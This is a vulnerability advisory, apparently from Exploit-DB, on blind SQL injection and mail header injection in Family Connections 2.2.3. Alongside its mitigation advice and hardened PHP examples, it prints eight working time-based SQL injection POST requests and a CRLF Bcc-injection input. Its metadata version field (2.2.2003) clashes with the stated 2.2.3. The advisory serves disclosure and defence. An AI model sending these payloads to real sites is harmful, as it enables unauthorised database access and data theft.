Vendor: Family Connections
By: Salvatore Fresta aka Drosophila
CVSS: 7.5 (HIGH)
Title: Multiple Blind SQL Injection, Multiple SMTP (mail header) Injection
CWE: 89, 200
Product Name: Family Connections
Affected Version From: 2.2.2003
Affected Version To: 2.2.2003
Patch Exists: NO
Related CWE:
CPE: a:family_connections:family_connections:2.2.3
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2010

Family Connections 2.2.3 Multiple Remote Vulnerabilities

Family Connections version 2.2.3 is affected by multiple vulnerabilities: several blind SQL injections and several mail header injections (labelled "SNMP injection" in the original advisory; the affected function is PHP's mail(), so this is SMTP/mail header injection). The blind SQL injections exist because numeric fields (the id parameters of recipes.php, addressbook.php, calendar.php and familynews.php, the aid and uid parameters of addressbook.php, and the category parameter of gallery/upload.php) are interpolated into SQL statements unquoted and without integer validation, so an attacker can append a boolean condition and infer its result from the response time. The mail header injection exists because parameters passed to the PHP mail() function are not sanitised, allowing CR/LF sequences in a user-supplied value to introduce arbitrary additional headers. Every sample request in the advisory carries a PHPSESSID cookie, so an authenticated session appears to be required.

Mitigation:

No vendor patch is listed. Numeric parameters should be validated as integers, or bound as typed parameters in prepared statements, before they reach a SQL statement, and any user-supplied value that ends up in a mail() header argument should be rejected if it contains CR or LF characters. Until a fix is available, restrict access to the affected scripts to trusted accounts.

Exploit-DB raw data:

Family Connections 2.2.3 Multiple Remote Vulnerabilities

 Name              Family Connections
 Vendor            http://www.familycms.com
 Versions Affected 2.2.3

 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-10-05

X. INDEX

 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
 

I. ABOUT THE APPLICATION

Family Connections (http://www.familycms.com) is a PHP and
MySQL based content management system for private family
websites. Its modules include recipes, a photo gallery, an
address book, a calendar and family news; these are the
scripts targeted by the requests in section IV.


II. DESCRIPTION

Many input fields are passed to SQL statements and to the
mail() function without proper sanitisation.


III. ANALYSIS

Summary:

 A) Multiple Blind SQL Injection
 B) Multiple SNMP Injection
 

A) Multiple Blind SQL Injection

All numeric  fields  that I tested are vulnerable to Blind
SQL Injection.
These bugs exist because numeric fields are interpolated
into SQL statements unquoted and without being validated
as integers, so a value such as "-1 OR <expression>" is
evaluated as part of the WHERE clause. The requests in
section IV use a time-based probe: the condition
ASCII(0x41) = 65 is always true, so a response delayed by
BENCHMARK() confirms the injection; replacing it with a
condition over data the attacker wants to read turns the
delay into a bit-by-bit extraction channel.
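The pattern described above, as an added example in PHP (this is not Family Connections' own code): a delete handler that interpolates an unquoted numeric id, beside two hardened variants. The table name fcms_recipes, the column name id and the function names are assumptions chosen to mirror the recipes.php request in section IV; only delete_recipe_prepared() would touch a database, and it is not called.

```php
<?php
declare(strict_types=1);

// Added example, not Family Connections' own code. fcms_recipes and id are
// assumed names; the demonstration at the bottom builds SQL text only.

// VULNERABLE pattern: the numeric field is interpolated unquoted, so the
// attacker needs no quote character to break out of it. The tail
// "OR IF(cond, BENCHMARK(...), NULL)" becomes part of the WHERE clause and
// the response delay leaks whether cond is true.
function build_delete_vulnerable(array $post): string
{
    $id = $post['id'];
    return "DELETE FROM fcms_recipes WHERE id = $id";
}

// FIX, step 1: strict validation. Only a plain integer string passes.
// (A bare (int) cast would silently turn the payload into -1, which is
// harmless here but hides the attack; rejecting is the better default.)
function validate_id(array $post): ?int
{
    $id = filter_var($post['id'] ?? '', FILTER_VALIDATE_INT);
    return $id === false ? null : $id;
}

// FIX, step 2: only the validated integer reaches the SQL text.
function build_delete_validated(array $post): ?string
{
    $id = validate_id($post);
    return $id === null ? null : "DELETE FROM fcms_recipes WHERE id = $id";
}

// FIX, preferred form: a prepared statement with a typed parameter. The id is
// sent separately from the statement text, so even an unvalidated value could
// not change the statement's structure.
function delete_recipe_prepared(mysqli $db, array $post): bool
{
    $id = validate_id($post);
    if ($id === null) {
        return false;
    }
    $stmt = $db->prepare('DELETE FROM fcms_recipes WHERE id = ?');
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('i', $id);
    return $stmt->execute();
}

// Demonstration without a database: the SQL each path would build for a
// benign request and for the recipes.php payload from section IV.
$benign = ['delconfirm' => '1', 'id' => '42'];
$attack = ['delconfirm' => '1',
           'id' => '-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)'];

echo "vulnerable/benign: ", build_delete_vulnerable($benign), "\n";
echo "vulnerable/attack: ", build_delete_vulnerable($attack), "\n";
echo "validated/benign:  ", build_delete_validated($benign) ?? 'rejected', "\n";
echo "validated/attack:  ", build_delete_validated($attack) ?? 'rejected', "\n";
```

Run with `php example.php`: the vulnerable builder echoes the whole injected tail into the DELETE statement, while the validated builder returns null for the payload and only ever emits an integer. The point of the unquoted-field case is that escaping functions such as mysql_real_escape_string() do nothing here, since the payload contains no quote to escape; integer validation or a typed bound parameter is the only real fix.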


B) Multiple SNMP Injection

The parameters passed to the mail() PHP function  are  not
properly sanitised. Because  the  header  string  given to
mail() is written into the message as-is, a CR/LF sequence
inside a user-supplied value such as a sender address ends
the current header and lets the attacker append arbitrary
mail headers (for example an extra Bcc: recipient). The
original advisory calls this "SNMP injection"; it is SMTP
(mail header) injection. Section IV gives no sample request
for it.
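The mail() header injection described above, as an added PHP example that is not Family Connections' own code: a contact-form handler that concatenates a user-supplied address into mail()'s additional_headers argument, beside a hardened version that rejects control characters. The field names email and subject, the function names and the constructed attack input are assumptions; no mail is actually sent.

```php
<?php
declare(strict_types=1);

// Added example, not Family Connections' own code. Field names are assumed;
// the functions only build the strings that would be handed to mail().

// VULNERABLE pattern: a user-supplied address is concatenated into the
// additional_headers argument of mail(). That string goes into the message
// unchanged, so a CR/LF inside the value ends the From: header and starts a
// new, attacker-chosen one, which the MTA then honours.
function build_headers_vulnerable(array $post): string
{
    return "From: " . $post['email'] . "\r\n"
         . "Reply-To: " . $post['email'] . "\r\n";
}

// HARDENED: refuse any header-bound value that contains a line break or NUL.
// A syntactically valid address can never contain CR or LF, so
// FILTER_VALIDATE_EMAIL alone already rejects the injection for the address;
// the explicit check is what protects free-text fields such as the subject.
function header_value(string $value): ?string
{
    return preg_match('/[\r\n\0]/', $value) === 1 ? null : $value;
}

function build_headers_hardened(array $post): ?string
{
    $email = filter_var($post['email'] ?? '', FILTER_VALIDATE_EMAIL);
    if ($email === false || header_value($email) === null) {
        return null;
    }
    return "From: $email\r\nReply-To: $email\r\n";
}

// The call site: reject the request instead of quietly stripping characters,
// so an injection attempt fails visibly and can be logged.
function send_contact_mail(string $to, array $post): bool
{
    $headers = build_headers_hardened($post);
    $subject = header_value($post['subject'] ?? '');
    if ($headers === null || $subject === null) {
        return false;
    }
    // mail($to, $subject, $post['body'] ?? '', $headers);  // omitted: no MTA here
    return true;
}

// Constructed attack input: the address field smuggles a Bcc: header.
$attack = [
    'email'   => "alice@example.org\r\nBcc: everyone@example.net",
    'subject' => 'Hello',
];

echo "vulnerable headers:\n", build_headers_vulnerable($attack);
echo "hardened headers: ", build_headers_hardened($attack) ?? 'rejected', "\n";
echo "send_contact_mail: ",
     send_contact_mail('admin@example.org', $attack) ? 'sent' : 'rejected', "\n";
```

Run with `php example.php`: the vulnerable builder emits the injected Bcc: line as a separate header, while the hardened builder returns null and send_contact_mail() refuses the request. Rejecting rather than stripping is deliberate: silently removing the CR/LF would let the rest of the attacker's text through as an apparently legitimate value.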


IV. SAMPLE CODE

A) Multiple Blind SQL Injection

POST /path/recipes.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

delconfirm=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)


POST /path/gallery/upload.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

category=(SELECT(IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)))


POST /path/addressbook.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

editsubmit=1&aid=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)


POST /path/addressbook.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

editsubmit=1&uid=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)


POST /path/calendar.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

edit=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)


POST /path/calendar.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

delconfirm=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)


POST /path/familynews.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

submitedit=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)


POST /path/familynews.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd

delconfirm=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)


V. FIX

No Fix.